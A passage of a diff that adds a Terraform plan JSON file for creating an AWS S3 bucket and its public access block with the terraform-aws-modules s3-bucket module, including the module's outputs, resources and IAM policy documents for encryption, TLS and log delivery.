@@ -0,0 +1,2082 @@ +{ + "format_version": "0.2", + "terraform_version": "1.0.7", + "planned_values": { + "root_module": { + "child_modules": [ + { + "resources": [ + { + "address": "module.s3-bucket.aws_s3_bucket.this[0]", + "mode": "managed", + "type": "aws_s3_bucket", + "name": "this", + "index": 0, + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "force_destroy": false, + "object_lock_enabled": false, + "tags": null, + "timeouts": null + }, + "sensitive_values": { + "cors_rule": [], + "grant": [], + "lifecycle_rule": [], + "logging": [], + "object_lock_configuration": [], + "replication_configuration": [], + "server_side_encryption_configuration": [], + "tags_all": {}, + "versioning": [], + "website": [] + } + }, + { + "address": "module.s3-bucket.aws_s3_bucket_public_access_block.this[0]", + "mode": "managed", + "type": "aws_s3_bucket_public_access_block", + "name": "this", + "index": 0, + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "block_public_acls": true, + "block_public_policy": true, + "ignore_public_acls": true, + "restrict_public_buckets": true + }, + "sensitive_values": {} + } + ], + "address": "module.s3-bucket" + } + ] + } + }, + "resource_changes": [ + { + "address": "module.s3-bucket.aws_s3_bucket.this[0]", + "module_address": "module.s3-bucket", + "mode": "managed", + "type": "aws_s3_bucket", + "name": "this", + "index": 0, + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "create" + ], + "before": null, + "after": { + "force_destroy": false, + "object_lock_enabled": false, + "tags": null, + "timeouts": null + }, + "after_unknown": { + "acceleration_status": true, + "acl": true, + "arn": true, + "bucket": true, + "bucket_domain_name": true, + "bucket_prefix": true, + "bucket_regional_domain_name": true, + "cors_rule": true, + "grant": true, + "hosted_zone_id": true, + "id": true, + "lifecycle_rule": true, + 
"logging": true, + "object_lock_configuration": true, + "policy": true, + "region": true, + "replication_configuration": true, + "request_payer": true, + "server_side_encryption_configuration": true, + "tags_all": true, + "versioning": true, + "website": true, + "website_domain": true, + "website_endpoint": true + }, + "before_sensitive": false, + "after_sensitive": { + "cors_rule": [], + "grant": [], + "lifecycle_rule": [], + "logging": [], + "object_lock_configuration": [], + "replication_configuration": [], + "server_side_encryption_configuration": [], + "tags_all": {}, + "versioning": [], + "website": [] + } + } + }, + { + "address": "module.s3-bucket.aws_s3_bucket_public_access_block.this[0]", + "module_address": "module.s3-bucket", + "mode": "managed", + "type": "aws_s3_bucket_public_access_block", + "name": "this", + "index": 0, + "provider_name": "registry.terraform.io/hashicorp/aws", + "change": { + "actions": [ + "create" + ], + "before": null, + "after": { + "block_public_acls": true, + "block_public_policy": true, + "ignore_public_acls": true, + "restrict_public_buckets": true + }, + "after_unknown": { + "bucket": true, + "id": true + }, + "before_sensitive": false, + "after_sensitive": {} + } + } + ], + "prior_state": { + "format_version": "0.2", + "terraform_version": "1.0.7", + "values": { + "root_module": { + "child_modules": [ + { + "resources": [ + { + "address": "module.s3-bucket.data.aws_caller_identity.current", + "mode": "data", + "type": "aws_caller_identity", + "name": "current", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "account_id": "101860328116", + "arn": "arn:aws:iam::101860328116:user/atlantis", + "id": "101860328116", + "user_id": "AIDARPN2ZIK2PHMJSNYXG" + }, + "sensitive_values": {} + }, + { + "address": "module.s3-bucket.data.aws_partition.current", + "mode": "data", + "type": "aws_partition", + "name": "current", + "provider_name": "registry.terraform.io/hashicorp/aws", + 
"schema_version": 0, + "values": { + "dns_suffix": "amazonaws.com", + "id": "aws", + "partition": "aws", + "reverse_dns_prefix": "com.amazonaws" + }, + "sensitive_values": {} + }, + { + "address": "module.s3-bucket.data.aws_region.current", + "mode": "data", + "type": "aws_region", + "name": "current", + "provider_name": "registry.terraform.io/hashicorp/aws", + "schema_version": 0, + "values": { + "description": "Europe (Frankfurt)", + "endpoint": "ec2.eu-central-1.amazonaws.com", + "id": "eu-central-1", + "name": "eu-central-1" + }, + "sensitive_values": {} + } + ], + "address": "module.s3-bucket" + } + ] + } + } + }, + "configuration": { + "provider_config": { + "aws": { + "name": "aws", + "expressions": { + "profile": { + "constant_value": "razorpay-stage" + }, + "region": { + "constant_value": "eu-central-1" + } + } + }, + "module.s3-bucket:aws": { + "name": "aws", + "version_constraint": ">= 5.27.0", + "module_address": "module.s3-bucket" + } + }, + "root_module": { + "module_calls": { + "s3-bucket": { + "source": "terraform-aws-modules/s3-bucket/aws", + "module": { + "outputs": { + "s3_bucket_arn": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The ARN of the bucket. Will be of format arn:aws:s3:::bucketname." + }, + "s3_bucket_bucket_domain_name": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].bucket_domain_name", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The bucket domain name. Will be of format bucketname.s3.amazonaws.com." + }, + "s3_bucket_bucket_regional_domain_name": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].bucket_regional_domain_name", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The bucket region-specific domain name. The bucket domain name including the region name, please refer here for format. 
Note: The AWS CloudFront allows specifying S3 region-specific endpoint when creating S3 origin, it will prevent redirect issues from CloudFront to S3 Origin URL." + }, + "s3_bucket_hosted_zone_id": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].hosted_zone_id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The Route 53 Hosted Zone ID for this bucket's region." + }, + "s3_bucket_id": { + "expression": { + "references": [ + "aws_s3_bucket_policy.this[0].id", + "aws_s3_bucket_policy.this[0]", + "aws_s3_bucket_policy.this", + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The name of the bucket." + }, + "s3_bucket_lifecycle_configuration_rules": { + "expression": { + "references": [ + "aws_s3_bucket_lifecycle_configuration.this[0].rule", + "aws_s3_bucket_lifecycle_configuration.this[0]", + "aws_s3_bucket_lifecycle_configuration.this" + ] + }, + "description": "The lifecycle rules of the bucket, if the bucket is configured with lifecycle rules. If not, this will be an empty string." + }, + "s3_bucket_policy": { + "expression": { + "references": [ + "aws_s3_bucket_policy.this[0].policy", + "aws_s3_bucket_policy.this[0]", + "aws_s3_bucket_policy.this" + ] + }, + "description": "The policy of the bucket, if the bucket is configured with a policy. If not, this will be an empty string." + }, + "s3_bucket_region": { + "expression": { + "references": [ + "aws_s3_bucket.this[0].region", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "description": "The AWS region this bucket resides in." + }, + "s3_bucket_website_domain": { + "expression": { + "references": [ + "aws_s3_bucket_website_configuration.this[0].website_domain", + "aws_s3_bucket_website_configuration.this[0]", + "aws_s3_bucket_website_configuration.this" + ] + }, + "description": "The domain of the website endpoint, if the bucket is configured with a website. If not, this will be an empty string. 
This is used to create Route 53 alias records." + }, + "s3_bucket_website_endpoint": { + "expression": { + "references": [ + "aws_s3_bucket_website_configuration.this[0].website_endpoint", + "aws_s3_bucket_website_configuration.this[0]", + "aws_s3_bucket_website_configuration.this" + ] + }, + "description": "The website endpoint, if the bucket is configured with a website. If not, this will be an empty string." + } + }, + "resources": [ + { + "address": "aws_s3_bucket.this", + "mode": "managed", + "type": "aws_s3_bucket", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "var.bucket" + ] + }, + "bucket_prefix": { + "references": [ + "var.bucket_prefix" + ] + }, + "force_destroy": { + "references": [ + "var.force_destroy" + ] + }, + "object_lock_enabled": { + "references": [ + "var.object_lock_enabled" + ] + }, + "tags": { + "references": [ + "var.tags" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_accelerate_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_accelerate_configuration", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "status": { + "references": [ + "var.acceleration_status" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.acceleration_status" + ] + } + }, + { + "address": "aws_s3_bucket_acl.this", + "mode": "managed", + "type": "aws_s3_bucket_acl", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "acl": { + "references": [ + "var.acl", + "var.acl" + ] + }, + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + 
"aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.create_bucket_acl" + ] + }, + "depends_on": [ + "aws_s3_bucket_ownership_controls.this" + ] + }, + { + "address": "aws_s3_bucket_analytics_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_analytics_configuration", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "name": { + "references": [ + "each.key" + ] + } + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "var.analytics_configuration", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_cors_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_cors_configuration", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.cors_rules" + ] + } + }, + { + "address": "aws_s3_bucket_intelligent_tiering_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_intelligent_tiering_configuration", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "name": { + "references": [ + "each.key" + ] + }, + "status": { + "references": [ + "each.value.status", + "each.value", + "each.value.status", + "each.value" + ] + } + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + 
"local.intelligent_tiering", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_inventory.this", + "mode": "managed", + "type": "aws_s3_bucket_inventory", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "each.value.bucket", + "each.value", + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "destination": [ + { + "bucket": [ + { + "account_id": { + "references": [ + "each.value.destination.account_id", + "each.value.destination", + "each.value" + ] + }, + "bucket_arn": { + "references": [ + "each.value.destination.bucket_arn", + "each.value.destination", + "each.value", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "format": { + "references": [ + "each.value.destination.format", + "each.value.destination", + "each.value" + ] + }, + "prefix": { + "references": [ + "each.value.destination.prefix", + "each.value.destination", + "each.value" + ] + } + } + ] + } + ], + "enabled": { + "references": [ + "each.value.enabled", + "each.value" + ] + }, + "included_object_versions": { + "references": [ + "each.value.included_object_versions", + "each.value" + ] + }, + "name": { + "references": [ + "each.key" + ] + }, + "optional_fields": { + "references": [ + "each.value.optional_fields", + "each.value" + ] + }, + "schedule": [ + { + "frequency": { + "references": [ + "each.value.frequency", + "each.value" + ] + } + } + ] + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "var.inventory_configuration", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_lifecycle_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_lifecycle_configuration", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + 
"expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.lifecycle_rules" + ] + }, + "depends_on": [ + "aws_s3_bucket_versioning.this" + ] + }, + { + "address": "aws_s3_bucket_logging.this", + "mode": "managed", + "type": "aws_s3_bucket_logging", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "target_bucket": { + "references": [ + "var.logging[\"target_bucket\"]", + "var.logging" + ] + }, + "target_prefix": { + "references": [ + "var.logging[\"target_prefix\"]", + "var.logging" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.logging" + ] + } + }, + { + "address": "aws_s3_bucket_metric.this", + "mode": "managed", + "type": "aws_s3_bucket_metric", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "name": { + "references": [ + "each.value.name", + "each.value" + ] + } + }, + "schema_version": 0, + "for_each_expression": { + "references": [ + "local.metric_configuration", + "local.create_bucket" + ] + } + }, + { + "address": "aws_s3_bucket_object_lock_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_object_lock_configuration", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "rule": [ + { + "default_retention": [ + { + "days": { + "references": [ + "var.object_lock_configuration.rule.default_retention.days", + 
"var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + }, + "mode": { + "references": [ + "var.object_lock_configuration.rule.default_retention.mode", + "var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + }, + "years": { + "references": [ + "var.object_lock_configuration.rule.default_retention.years", + "var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + } + } + ] + } + ], + "token": { + "references": [ + "var.object_lock_configuration.token", + "var.object_lock_configuration" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.object_lock_enabled", + "var.object_lock_configuration.rule.default_retention", + "var.object_lock_configuration.rule", + "var.object_lock_configuration" + ] + } + }, + { + "address": "aws_s3_bucket_ownership_controls.this", + "mode": "managed", + "type": "aws_s3_bucket_ownership_controls", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "local.attach_policy", + "aws_s3_bucket_policy.this[0].id", + "aws_s3_bucket_policy.this[0]", + "aws_s3_bucket_policy.this", + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "rule": [ + { + "object_ownership": { + "references": [ + "var.object_ownership" + ] + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.control_object_ownership" + ] + }, + "depends_on": [ + "aws_s3_bucket_policy.this", + "aws_s3_bucket_public_access_block.this", + "aws_s3_bucket.this" + ] + }, + { + "address": "aws_s3_bucket_policy.this", + "mode": "managed", + "type": "aws_s3_bucket_policy", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": 
{ + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "policy": { + "references": [ + "data.aws_iam_policy_document.combined[0].json", + "data.aws_iam_policy_document.combined[0]", + "data.aws_iam_policy_document.combined" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.attach_policy" + ] + }, + "depends_on": [ + "aws_s3_bucket_public_access_block.this" + ] + }, + { + "address": "aws_s3_bucket_public_access_block.this", + "mode": "managed", + "type": "aws_s3_bucket_public_access_block", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "block_public_acls": { + "references": [ + "var.block_public_acls" + ] + }, + "block_public_policy": { + "references": [ + "var.block_public_policy" + ] + }, + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "ignore_public_acls": { + "references": [ + "var.ignore_public_acls" + ] + }, + "restrict_public_buckets": { + "references": [ + "var.restrict_public_buckets" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_public_policy" + ] + } + }, + { + "address": "aws_s3_bucket_replication_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_replication_configuration", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "role": { + "references": [ + "var.replication_configuration[\"role\"]", + "var.replication_configuration" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.replication_configuration" + ] + }, + "depends_on": [ + "aws_s3_bucket_versioning.this" + ] + }, + { + "address": 
"aws_s3_bucket_request_payment_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_request_payment_configuration", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "payer": { + "references": [ + "var.request_payer" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.request_payer" + ] + } + }, + { + "address": "aws_s3_bucket_server_side_encryption_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_server_side_encryption_configuration", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.server_side_encryption_configuration" + ] + } + }, + { + "address": "aws_s3_bucket_versioning.this", + "mode": "managed", + "type": "aws_s3_bucket_versioning", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + }, + "mfa": { + "references": [ + "var.versioning[\"mfa\"]", + "var.versioning" + ] + }, + "versioning_configuration": [ + { + "mfa_delete": { + "references": [ + "var.versioning[\"mfa_delete\"]", + "var.versioning", + "var.versioning[\"mfa_delete\"]", + "var.versioning" + ] + }, + "status": { + "references": [ + "var.versioning[\"enabled\"]", + "var.versioning", + "var.versioning[\"status\"]", + 
"var.versioning", + "var.versioning[\"status\"]", + "var.versioning" + ] + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.versioning" + ] + } + }, + { + "address": "aws_s3_bucket_website_configuration.this", + "mode": "managed", + "type": "aws_s3_bucket_website_configuration", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "bucket": { + "references": [ + "aws_s3_bucket.this[0].id", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "expected_bucket_owner": { + "references": [ + "var.expected_bucket_owner" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.website" + ] + } + }, + { + "address": "data.aws_caller_identity.current", + "mode": "data", + "type": "aws_caller_identity", + "name": "current", + "provider_config_key": "s3-bucket:aws", + "schema_version": 0 + }, + { + "address": "data.aws_canonical_user_id.this", + "mode": "data", + "type": "aws_canonical_user_id", + "name": "this", + "provider_config_key": "s3-bucket:aws", + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.create_bucket_acl", + "var.owner[\"id\"]", + "var.owner" + ] + } + }, + { + "address": "data.aws_iam_policy_document.access_log_delivery", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "access_log_delivery", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "logging.s3.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "AWSAccessLogDeliveryWrite" + } + }, + { + "actions": { + 
"constant_value": [ + "s3:GetBucketAcl" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "logging.s3.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "AWSAccessLogDeliveryAclCheck" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_access_log_delivery_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.combined", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "combined", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "source_policy_documents": { + "references": [ + "var.attach_elb_log_delivery_policy", + "data.aws_iam_policy_document.elb_log_delivery[0].json", + "data.aws_iam_policy_document.elb_log_delivery[0]", + "data.aws_iam_policy_document.elb_log_delivery", + "var.attach_lb_log_delivery_policy", + "data.aws_iam_policy_document.lb_log_delivery[0].json", + "data.aws_iam_policy_document.lb_log_delivery[0]", + "data.aws_iam_policy_document.lb_log_delivery", + "var.attach_access_log_delivery_policy", + "data.aws_iam_policy_document.access_log_delivery[0].json", + "data.aws_iam_policy_document.access_log_delivery[0]", + "data.aws_iam_policy_document.access_log_delivery", + "var.attach_require_latest_tls_policy", + "data.aws_iam_policy_document.require_latest_tls[0].json", + "data.aws_iam_policy_document.require_latest_tls[0]", + "data.aws_iam_policy_document.require_latest_tls", + "var.attach_deny_insecure_transport_policy", + "data.aws_iam_policy_document.deny_insecure_transport[0].json", + "data.aws_iam_policy_document.deny_insecure_transport[0]", + "data.aws_iam_policy_document.deny_insecure_transport", + "var.attach_deny_unencrypted_object_uploads", + 
"data.aws_iam_policy_document.deny_unencrypted_object_uploads[0].json", + "data.aws_iam_policy_document.deny_unencrypted_object_uploads[0]", + "data.aws_iam_policy_document.deny_unencrypted_object_uploads", + "var.attach_deny_incorrect_kms_key_sse", + "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0].json", + "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0]", + "data.aws_iam_policy_document.deny_incorrect_kms_key_sse", + "var.attach_deny_incorrect_encryption_headers", + "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0].json", + "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0]", + "data.aws_iam_policy_document.deny_incorrect_encryption_headers", + "var.attach_inventory_destination_policy", + "var.attach_analytics_destination_policy", + "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0].json", + "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0]", + "data.aws_iam_policy_document.inventory_and_analytics_destination_policy", + "var.attach_policy", + "var.policy" + ] + } + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "local.attach_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_incorrect_encryption_headers", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_incorrect_encryption_headers", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "StringNotEquals" + }, + "values": { + "references": [ + "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default.sse_algorithm", + "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default", + "var.server_side_encryption_configuration.rule", + "var.server_side_encryption_configuration" + ] + }, + "variable": { + "constant_value": 
"s3:x-amz-server-side-encryption" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyIncorrectEncryptionHeaders" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_incorrect_encryption_headers" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_incorrect_kms_key_sse", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_incorrect_kms_key_sse", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "StringNotEquals" + }, + "values": { + "references": [ + "var.allowed_kms_key_arn" + ] + }, + "variable": { + "constant_value": "s3:x-amz-server-side-encryption-aws-kms-key-id" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyIncorrectKmsKeySse" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_incorrect_kms_key_sse" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_insecure_transport", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_insecure_transport", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:*" + ] + }, + "condition": [ + { + "test": { + 
"constant_value": "Bool" + }, + "values": { + "constant_value": [ + "false" + ] + }, + "variable": { + "constant_value": "aws:SecureTransport" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyInsecureTransport" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_insecure_transport_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.deny_unencrypted_object_uploads", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "deny_unencrypted_object_uploads", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "Null" + }, + "values": { + "constant_value": [ + true + ] + }, + "variable": { + "constant_value": "s3:x-amz-server-side-encryption" + } + } + ], + "effect": { + "constant_value": "Deny" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "*" + ] + }, + "type": { + "constant_value": "*" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "denyUnencryptedObjectUploads" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_deny_unencrypted_object_uploads" + ] + } + }, + { + "address": "data.aws_iam_policy_document.elb_log_delivery", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "elb_log_delivery", + "provider_config_key": 
"s3-bucket:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "effect": { + "constant_value": "Allow" + }, + "principals": [ + { + "identifiers": { + "constant_value": [ + "logdelivery.elasticloadbalancing.amazonaws.com" + ] + }, + "type": { + "constant_value": "Service" + } + } + ], + "resources": { + "references": [ + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this" + ] + }, + "sid": { + "constant_value": "" + } + } + ] + }, + "schema_version": 0, + "count_expression": { + "references": [ + "local.create_bucket", + "var.attach_elb_log_delivery_policy" + ] + } + }, + { + "address": "data.aws_iam_policy_document.inventory_and_analytics_destination_policy", + "mode": "data", + "type": "aws_iam_policy_document", + "name": "inventory_and_analytics_destination_policy", + "provider_config_key": "s3-bucket:aws", + "expressions": { + "statement": [ + { + "actions": { + "constant_value": [ + "s3:PutObject" + ] + }, + "condition": [ + { + "test": { + "constant_value": "ArnLike" + }, + "values": { + "references": [ + "var.inventory_self_source_destination", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + "var.inventory_source_bucket_arn", + "var.analytics_self_source_destination", + "aws_s3_bucket.this[0].arn", + "aws_s3_bucket.this[0]", + "aws_s3_bucket.this", + 